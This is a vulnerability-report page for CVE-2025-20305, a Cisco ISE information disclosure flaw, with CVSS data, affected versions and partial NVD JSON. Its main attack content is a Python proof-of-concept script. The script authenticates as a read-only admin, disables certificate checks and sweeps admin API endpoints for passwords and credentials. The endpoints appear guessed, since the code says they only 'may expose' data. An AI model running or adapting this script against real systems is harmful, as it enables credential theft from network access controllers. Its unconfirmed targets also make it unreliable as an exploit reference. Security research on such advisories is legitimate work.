Security Vulnerability Report
CVE-2025-20305 CVSS 4.3 MEDIUM

CVE-2025-20305

Published: 2025-11-05 17:15:37
Last Modified: 2025-11-19 15:02:15

Description

A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to obtain sensitive information from an affected device. This vulnerability exists because certain files lack proper data protection mechanisms. An attacker with read-only Administrator privileges could exploit this vulnerability by performing actions where the results should only be viewable to a high-privileged user. A successful exploit could allow the attacker to view passwords that are normally not visible to read-only administrators.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:identity_services_engine:3.2.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch3:*:*:*:*:*:* - VULNERABLE
Cisco ISE 2.x, all unpatched versions
Cisco ISE 3.x, all unpatched versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json
import sys
from urllib.parse import urljoin

# CVE-2025-20305 PoC - Cisco ISE Information Disclosure
# This PoC demonstrates exploiting the information disclosure vulnerability
# that allows read-only administrators to view passwords normally hidden
# from low-privilege users.


class CiscoISEPoC:
    def __init__(self, target_url, username, password):
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.session.verify = False  # Disable SSL verification for testing
        self.token = None

    def authenticate(self):
        """Authenticate with Cisco ISE using read-only admin credentials"""
        login_url = f"{self.target_url}/admin/login.jsp"
        auth_data = {
            'username': self.username,
            'password': self.password
        }
        try:
            response = self.session.post(login_url, data=auth_data, timeout=30)
            if response.status_code == 200 and 'Admin' in response.text:
                print(f"[+] Successfully authenticated as {self.username}")
                return True
            print("[-] Authentication failed")
            return False
        except requests.RequestException as e:
            print(f"[-] Connection error: {e}")
            return False

    def exploit_information_disclosure(self):
        """Exploit the vulnerability to obtain sensitive information"""
        # Target endpoints that may expose sensitive data to low-privilege users
        targets = [
            '/admin/API/mnt/AdminUser/list',
            '/admin/API/systemConfig/getPasswords',
            '/admin/API/AdminUser/getAllUsers',
            '/admin/API/identity/getCredentials'
        ]
        results = []
        for endpoint in targets:
            try:
                url = urljoin(self.target_url, endpoint)
                response = self.session.get(url, timeout=30)
                if response.status_code == 200:
                    # Check if response contains sensitive information
                    if 'password' in response.text.lower() or 'credential' in response.text.lower():
                        print(f"[+] Sensitive data found at {endpoint}")
                        results.append({
                            'endpoint': endpoint,
                            'data': response.text,
                            'status': 'VULNERABLE'
                        })
            except requests.RequestException:
                continue
        return results

    def run(self):
        """Execute the PoC exploitation"""
        print(f"[*] Targeting: {self.target_url}")
        print(f"[*] Using credentials: {self.username}/{self.password}")
        if not self.authenticate():
            return None
        print("[*] Attempting to exploit information disclosure...")
        results = self.exploit_information_disclosure()
        if results:
            print(f"\n[!] Found {len(results)} vulnerable endpoints")
            return results
        else:
            print("[-] No vulnerable endpoints found or already patched")
            return None


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print("Usage: python cve_2025_20305_poc.py <target_url> <username> <password>")
        print("Example: python cve_2025_20305_poc.py https://ise.example.com admin readonlypass")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    poc = CiscoISEPoC(target, user, password)
    poc.run()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20305", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:37.170", "lastModified": "2025-11-19T15:02:15.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to obtain sensitive information from an affected device.\r\n\r This vulnerability exists because certain files lack proper data protection mechanisms. An attacker with read-only Administrator privileges could exploit this vulnerability by performing actions where the results should only be viewable to a high-privileged user. A successful exploit could allow the attacker to view passwords that are normally not visible to read-only administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1220"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, 
"criteria": "cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.1.0", "matchCriteriaId": "A219182D-3C7A-4DFE-B716-3F77705C3D00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "7932D5D5-83E1-4BEF-845A-D0783D4BB750"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch1:*:*:*:*:*:*", "matchCriteriaId": "1B818846-4A6E-4256-B344-281E8C786C43"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch2:*:*:*:*:*:*", "matchCriteriaId": "A44858A2-922A-425A-8B38-0C47DB911A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch3:*:*:*:*:*:*", "matchCriteriaId": "53484A32-757B-42F8-B655-554C34222060"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch4:*:*:*:*:*:*", "matchCriteriaId": "0CCAC61F-C273-49B3-A631-31D3AE3EB148"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch5:*:*:*:*:*:*", "matchCriteriaId": "51AEFCE6-FB4A-4B1C-A23D-83CC3CF3FBBD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch6:*:*:*:*:*:*", "matchCriteriaId": "B452B4F0-8510-475E-9AE8-B48FABB4D7D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch7:*:*:*:*:*:*", "matchCriteriaId": "5733512D-12B5-4098-AF90-9D68217FAC27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "F1B9C2C1-59A4-49A0-9B74-83CCB063E55D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch1:*:*:*:*:*:*", "matchCriteriaId": "DFD29A0B-0D75-4EAB-BCE0-79450EC75DD0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch2:*:*:*:*:*:*", "matchCriteriaId": "E6C94CC4-CC08-4DAF-A606-FDAFC92720A9"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch3:*:*:*:*:*:*", "matchCriteriaId": "BB069EA3-7B8C-42B5-8035-2EE5ED3F56E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch4:*:*:*:*:*:*", "matchCriteriaId": "FF8B81A6-BF44-4E5F-B167-39F61DDCA026"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch5:*:*:*:*:*:*", "matchCriteriaId": "56E0F0EC-3E66-4866-89F5-89B331F3F517"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch6:*:*:*:*:*:*", "matchCriteriaId": "2E3E8937-2859-4A2A-91C0-05F674EF0466"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch7:*:*:*:*:*:*", "matchCriteriaId": "D4B14684-EB9E-405B-85FA-B62E57CB292C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "D23905E0-E525-49B1-8E5F-4EB42D186768"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch1:*:*:*:*:*:*", "matchCriteriaId" ... (truncated)